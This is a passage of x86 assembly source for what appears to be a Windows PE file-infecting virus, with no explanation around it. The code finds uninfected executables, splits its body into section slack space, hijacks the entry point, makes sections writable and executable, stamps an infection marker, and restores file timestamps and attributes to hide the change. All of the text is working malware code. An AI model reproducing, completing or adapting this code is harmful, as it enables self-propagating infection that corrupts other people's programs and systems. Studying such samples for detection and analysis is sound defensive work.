mov eax,BASPARAM
call GetFInfo
push dword ptr [ecx+4*8]
push large 80h ;FILE_ATTRIBUTE_NORMAL
pop edx
mov [ecx+4*8],edx
call SetFInfo
pop dword ptr [ecx+4*8]
cmp word ptr [esi+MEM_INF_POS],INF_SIGN ;check infected
jz NewNCF_1
;Check PE header
cmp word ptr [esi],'ZM'
jnz NewNCF_1
mov eax,[esi+3ch]
cmp eax,600h
ja NewNCF_1
add eax,esi
cmp word ptr [eax],'EP'
jnz NewNCF_1
test byte ptr [eax+16h+1],20h ;Is a DLL?
jnz NewNCF_1
mov bl,[eax+5ch] ;Subsystem
and bl,0feh
cmp bl,2
jnz NewNCF_1
;Check whether the file is a SFX(RAR file)
xor edi,edi
call get_section_of_rva
mov ecx,[edx+0ch]
add ecx,[edx+8]
mov esi,ecx
shr ecx,3
add ecx,esi
cmp ecx,38383838h
FileLen equ $-4
jna NewNCF_1
mov dword ptr [ebp+blk_min_size-NewNCF_IP],vir_first_blk_size+8
mov dword ptr [ebp+remaind_size-NewNCF_IP],VirSize
xor edx,edx
mov [ebp+BlkNum-NewNCF_IP],dl
cld
push eax
mov ecx,MAX_BLK_NUM*2
lea edi,[ebp+BlkBuf-NewNCF_IP]
xor eax,eax
rep stosd
pop eax
first_section:
movzx edx,word ptr [eax+14h]
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize
next_section:
add edx,28h
mov ecx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
cmp ecx,edi
jna short file_op_1
xchg edi,ecx
file_op_1:
add ecx,[edx+0ch]
mov edi,vir_first_blk_size+8+38h
call is_final_section
jz short inf_at_tail
mov edi,[edx+28h+0ch]
sub edi,ecx
cmp edi,vir_first_blk_size+8
blk_min_size equ $-4
;NOTE:Next section's PointerToRawData may be 0 or less than current PointerToRawData
;if so,don't use this section.So use jl instead of jc
jl goto_next_section
inf_at_tail:
;Some PE file's .BSS(uninitialized data) and .TLS section's PointerToRawData can be 0,it doesn't take
;disk space.If infect this kind of section,the file will be damaged.So must avoid it.
cmp dword ptr [edx+0ch],0 ;this section's PointerToRawData==0?
jz goto_next_section
xchg edi,ecx
xor ebx,ebx
mov bl,0
BlkNum equ $-1
mov [ebp+ebx*8+BlkPtr-NewNCF_IP],edi ;where to write
sub edi,[edx+0ch]
add edi,[edx+4]
add edi,8
mov [ebp+ebx*8+BlkBuf-NewNCF_IP],edi ;RVA to read
sub ecx,8
cmp ecx,[ebp+remaind_size-NewNCF_IP]
jl short file_op_8
mov ecx,[ebp+remaind_size-NewNCF_IP]
file_op_8:
sub [ebp+remaind_size-NewNCF_IP],ecx
mov [ebp+ebx*8+4+BlkBuf-NewNCF_IP],ecx ;how much bytes to write
mov bl,[ebp+BlkNum-NewNCF_IP]
or bl,bl ;is first block?
jnz file_op_2 ;No
; mov word ptr [ebp+ebx*8+2+BlkBuf-NewNCF_IP],INF_SIGN
or dword ptr [edx+1ch],00000020h or 00000040h or 10000000h or 20000000h or 40000000h or 80000000h ; modify section's Characteristics
mov ebx,[eax+28h] ;AddressOfEntryPoint
mov [ebp+host_entry_rva-NewNCF_IP],ebx ;save host code entry
mov [eax+28h],edi
add edi,(_start_ip-_start)
mov [ebp+host_section_rva-NewNCF_IP],edi ;save host code base
file_op_2:
mov dword ptr [ebp+blk_min_size-NewNCF_IP],INF_MIN_BLK_SIZE
mov ebx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
xor esi,esi
cmp ebx,edi
jna short file_op_3
xchg edi,ebx
inc esi
file_op_3:
add ebx,ecx
add ebx,8
file_op_4:
cmp ebx,edi ;is bigger one less than small one?
jna short file_op_5 ;no
add edi,[eax+3ch] ;FileAlignment
jmp short file_op_4
file_op_5:
or esi,esi
jz short file_op_6
xchg edi,ebx
file_op_6:
mov [edx],ebx
mov [edx+8],edi
or dword ptr [edx+1ch],00000040h or 40000000h; modify section's Characteristics
and dword ptr [edx+1ch],not 02020000 ;delete discardable Characteristics
inc byte ptr [ebp+BlkNum-NewNCF_IP]
goto_next_section:
mov ecx,VirSize
remaind_size equ $-4
jecxz file_op_ok
call is_final_section
jnz next_section
jmp first_section
file_op_ok:
xor edi,edi
call get_section_of_rva
;Round image size
mov ecx,[edx]
add ecx,[edx+4]
mov ebx,[eax+50h]
file_op_9:
cmp ecx,ebx
jbe short file_op_10
add ebx,[eax+38h]
jmp short file_op_9
file_op_10:
mov [eax+50h],ebx
;Round physical size
mov ecx,[edx+8]
add ecx,[edx+0ch]
mov [ebp+PhySize-NewNCF_IP],ecx
lea esi,[ebp+_start-NewNCF_IP]
xor ebx,ebx
xor edx,edx
WriteBlkLoop:
mov [ebp+TmpBuf-NewNCF_IP],ebx
mov eax,[ebp+edx*8+8+BlkBuf-NewNCF_IP]
mov [ebp+TmpBuf-NewNCF_IP],eax
mov eax,[ebp+edx*8+4+BlkBuf-NewNCF_IP]
mov [ebp+4+TmpBuf-NewNCF_IP],eax
push esi
push large 8
pop ecx
mov eax,[ebp+edx*8+BlkPtr-NewNCF_IP]
lea esi,[ebp+TmpBuf-NewNCF_IP]
call WriteToFile
pop esi
add eax,8
mov ecx,[ebp+edx*8+4+BlkBuf-NewNCF_IP]
call WriteToFile
add esi,ecx
inc edx
movzx ecx,byte ptr [ebp+BlkNum-NewNCF_IP]
cmp edx,ecx
jc WriteBlkLoop
lea esi,[ebp+VirBuf-NewNCF_IP]
push esi
mov word ptr [esi+MEM_INF_POS],INF_SIGN ;Set infected sign.
xor eax,eax
mov ecx,BUFSIZE
call WriteToFile
pop esi
;Englarge file if necessary
mov eax,STDPARAM
call GetFInfo
mov edx,82345678h
PhySize equ $-4
mov eax,edx
sub edx,[ecx+8]
jl EnglargeFile_1
cmp edx,BUFSIZE
ja EnglargeFile_1
xchg edx,ecx
call WriteToFile
EnglargeFile_1:
NewNCF_1:
mov eax,BASPARAM
call SetFInfo ;restore file time and attr
NewNCF_ret_2:
push dword ptr [ebp+hHandle-NewNCF_IP]
call [ebp+addrNtZwClose-NewNCF_IP]
NewNCF_ret_1:
dec byte ptr [ebp+IsBusy-NewNCF_IP]
NewNCF_ret:
popfd
popad
retn
;in--edx->current section VirtualSize,eax->PE base,ebx->base address,ebp->file_op_ip
;out--ZF set is final,ZF cleared isn't final
is_final_section:
pushad
mov ecx,edx
xor edi,edi
call get_section_of_rva
cmp ecx,edx
popad
retn
is_final_section_end:
;in--eax=offset,esi->buffer,ecx=size
WriteToFile:
pushad
mov dword ptr [ebp+PosInfo-NewNCF_IP],eax
mov dword ptr [ebp+4+PosInfo-NewNCF_IP],0
mov eax,POSPARAM
push ecx
call SetFInfo
pop ecx
xor eax,eax
push eax
push eax
push ecx
push esi
lea ecx,[ebp+temp-NewNCF_IP]
push ecx
push eax
push eax
push eax
push dword ptr [ebp+hHandle-NewNCF_IP]
call [ebp+addrZwWriteFile-NewNCF_IP]
popad
retn
;Get the section of a RVA
;in--eax=PE base,edi=RVA to find
;out--edx->section header.VirtualSize,ecx=0 means not found
;if not found,edx=>last section header.VirtualSize
get_section_of_rva:
push ecx
movzx edx,word ptr [eax+14h]
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize
movzx ecx,word ptr [eax+6]
inc ecx
get_section_of_rva_1:
dec ecx
jecxz get_section_of_rva_2
add edx,28h ;->VirtualSize
mov esi,[edx+4]; esi=VirtualAddress
cmp edi,esi ;RVA<VirtualAddress?
jc short get_section_of_rva_1
add esi,[edx]; esi=VirtualAddress+VirtualSize
cmp esi,edi;VirtualAddress+VirtualSize<RVA
jna short get_section_of_rva_1
get_section_of_rva_2:
or ecx,ecx
pop ecx
retn
get_section_of_rva_end:
;in--ah=infotype,al=len,high 16 bit=disp of info buffer and NewNCF_IP,ebp->NewNCF_IP
;out--ecx->info buffer
GetFInfo:
GetFInfo_IP equ NewNCF_IP
pushad
movzx ebx,ah
push ebx
movzx ebx,al
push ebx
shr eax,16
add eax,ebp
push eax
mov [esp+3*4+6*4],eax
lea ebx,[ebp+temp-GetFInfo_IP]
push ebx
push dword ptr [ebp+hHandle-GetFInfo_IP]
call [ebp+addrZwQueryInformationFile-GetFInfo_IP]
popad
retn
;in--ah=infotype,al=len,high 16 bit=disp of info buffer and NewNCF_IP,ebp->NewNCF_IP
;out--ecx->info buffer
SetFInfo:
SetFInfo_IP equ NewNCF_IP
pushad
movzx ebx,ah
push ebx
movzx ebx,al
push ebx
shr eax,16
add eax,ebp
push eax
mov [esp+3*4+6*4],eax
lea ebx,[ebp+temp-SetFInfo_IP]
push ebx
push dword ptr [ebp+hHandle-SetFInfo_IP]
call [ebp+addrZwSetInformationFile-SetFInfo_IP]
popad
retn
eax_to_lowcase:
push ecx
push large 4
pop ecx
eax_to_lowcase_0:
cmp al,'A'
jc eax_to_lowcase_1
cmp al,'Z'
ja eax_to_lowcase_1
add al,'a'-'A'
eax_to_lowcase_1:
ror eax,8
loop eax_to_lowcase_0
pop ecx
retn
VirSize equ $-_start
uninit_data:
align 4
temp db 32 dup (0)
TmpBuf db 8 dup (0)
PosInfo dd 0,0
BasInfo dd 0,0, 0,0, 0,0, 0,0, 0 ,0
StdInfo dd 0,0, 0,0, 0, 0, 0
align 4
FLen dd 0
BlkBuf dd 2*MAX_BLK_NUM dup (0)
BlkPtr dd MAX_BLK_NUM dup (0)
VirBuf db BUFSIZE dup (0)
if DEBUG
hexstr db 16 dup(0)
endif
MemSize equ $-_start
host:
push large 0
push offset cap
if 0
call nxt
if DEBUG
db 'Game over',0
else
db 'Released!!!',0
endif
nxt:
endif
push offset cap
push large 0
call MessageBoxA
push large 0
call ExitProcess
end _start